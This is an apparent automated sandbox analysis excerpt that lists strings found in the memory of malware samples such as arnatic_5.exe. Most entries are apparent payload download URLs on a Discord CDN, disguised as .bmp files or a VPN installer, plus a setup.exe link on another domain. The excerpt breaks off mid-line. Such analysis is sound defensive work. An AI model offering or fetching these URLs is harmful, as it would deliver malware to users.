Source: arnatic_5.exe, 00000013.00000003.402660540.0000000007C48000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: arnatic_5.exe, 00000013.00000003.402660540.0000000007C48000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp, arnatic_5.exe, 00000013.00000000.302483192.0000000000EBB000.00000002.00020000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp, arnatic_5.exe, 00000013.00000000.302483192.0000000000EBB000.00000002.00020000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll0
Source: arnatic_5.exe, 00000013.00000003.381215822.0000000003F66000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389209367.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386699379.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456885585.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379380319.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://xmtbsj.com/setup.exe
Source: arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: http://xmtbsj.com/setup.exeC:
Source: arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://xmtbsj.com/setup.exeg
Source: arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://xmtbsj.com/setup.exew
Source: arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456885585.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/G
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_4.exe, 00000011.00000000.300543273.0000000000D32000.00000002.00020000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/859162831710846989/864849557661286400/Bear_Vpn.exe
Source: arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/928293476800532500/utube0501.bmp
Source: arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/928293476800532500/utube0501.bmpC:
Source: arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406082315.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435125355.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.438103128.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421539113.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/928293476800532500/utube0501.bmpmp
Source: arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930749897811062804/help1201.bmp
Source: arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488951397.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930749897811062804/help1201.bmp331/o
Source: arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930749897811062804/help1201.bmpC:
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930749897811062804/help1201.bmpM
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930749897811062804/help1201.bmpe
Source: arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428067710.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480638589.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
Source: arnatic_5.exe, 00000013.00000003.451469784.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429864201.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441257967.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432262657.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428067710.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpB
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpC:
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpM
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpY
Source: arnatic_5.exe, 00000013.00000003.429864201.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441257967.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432262657.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428067710.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpp
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpq
Source: arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406082315.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435125355.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.438103128.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421539113.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931152760785760336/stalkar_4mo.bmp
Source: arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931152760785760336/stalkar_4mo.bmpC82860-4
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931152760785760336/stalkar_4mo.bmpC:
Source: arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406082315.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435125355.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443044019.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.438103128.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421539113.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931152760785760336/stalkar_4mo.bmpmpH
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931210851506065438/new_v11.bmp
Source: arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931210851506065438/new_v11.bmp$
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931210851506065438/new_v11.bmpC:
Source: arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406228178.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405599011.0000000003F39000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/910842184708792331/931210851506065438/new_v11.bmpp
Source: arnatic_5.exe, 00000013.00000003.431944384.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406082315.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489168410.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426514646.0000000003F8A000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.415818417.0000000003F39000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435125355.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429303777.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426562167.0000000003F9A000.00000004.00000001.sdmp, arnatic_5.exe, 